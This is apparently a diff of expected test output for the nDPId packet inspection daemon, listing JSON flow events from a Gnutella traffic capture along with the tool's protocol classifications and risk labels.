+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90184,"flow_last_seen":288014,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3860,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82063,"flow_last_seen":371839,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.153.143.54","src_port":28681,"dst_port":65535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":373496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.69.142.133","src_port":28681,"dst_port":15471,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90073,"flow_last_seen":287523,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3852,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82062,"flow_last_seen":433134,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82063,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":89966,"flow_last_seen":287418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4798,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82061,"flow_last_seen":433137,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":90039,"flow_last_seen":287497,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82057,"flow_last_seen":433136,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.244.228.86","src_port":28681,"dst_port":10131,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82061,"flow_last_seen":373494,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.99.164.4","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":89829,"flow_last_seen":287443,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3598,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":371836,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82066,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287634,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4009,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82058,"flow_last_seen":311750,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.163.231.160","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90864,"flow_last_seen":287337,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1242,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90039,"flow_last_seen":287415,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5624,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": 
{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82059,"flow_last_seen":373496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.107.176","src_port":28681,"dst_port":20363,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":373497,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.217.132.111","src_port":28681,"dst_port":25394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":431829,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.150.49.35","src_port":28681,"dst_port":32448,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":89829,"flow_last_seen":287526,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82062,"flow_last_seen":371838,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.196.58","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82058,"flow_last_seen":311749,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.120.26.86","src_port":28681,"dst_port":29946,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82060,"flow_last_seen":433136,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":90005,"flow_last_seen":287678,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5605,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00566{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82064,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"138.199.16.123","src_port":28681,"dst_port":52993,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90138,"flow_last_seen":287483,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3990,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6445,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82058,"flow_last_seen":431830,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":454778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":280014,"flow_last_seen":283055,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":464672,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57552,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
